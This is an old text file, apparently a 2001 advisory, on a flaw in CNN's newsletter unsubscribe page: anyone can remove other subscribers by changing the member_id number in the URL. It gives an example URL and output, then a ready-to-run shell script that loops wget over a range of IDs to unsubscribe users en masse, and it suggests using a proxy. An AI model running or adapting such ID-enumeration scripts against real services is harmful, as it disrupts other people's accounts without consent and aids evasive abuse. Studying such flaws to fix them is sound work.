cnn_unsubscribe_bot.txt

`CNN List Un-Subscribe bot  
  
# Date: 8/22/01  
# Author: Jay Daniels <[email protected]>  
  
  
PROBLEM:   
Anyone can Un-Subscribe other users from CNN's distribution list by placing a   
random number at the end of unsubscribe cgi URL's member_id.  
  
CAUSE: There is no confirmation request! I can't remember if there is a   
confirmation request when subscribing, if not then a similar method could be   
used to post/subscribe others without their knowledge.  
  
[example: quicknews]  
  
http://cgi.cnn.com/cgi-bin/quicknews/register1?member_id=3465865  
  
[output]  
>User removed  
>The email address [email protected] has been removed from the e-wiretext   
>distribution list(s). This change should take effect within 24 hours.  
  
I do not know the exact range for member_id so you can just start at [start_memid]  
and go up.  
  
  
Now you could make a simple shell script to do this using wget:  
  
#!/bin/sh  
# you may want to use a proxy or adjust wget options see %wget -h  
  
# path for wget  
path="/usr/bin"  
  
  
if [ $# != 2 ]; then  
echo "Usage: $0 [start_memid] [stop_memid]"  
exit 1  
fi  
  
  
count=$(($1))  
  
while [ "$count" -le "$2" ]; do  
$path/wget -a $0.log http://cgi.cnn.com/cgi-bin/quicknews/register1?member_id=$count  
count=$(($count + 1))  
done  
  
exit 0  
`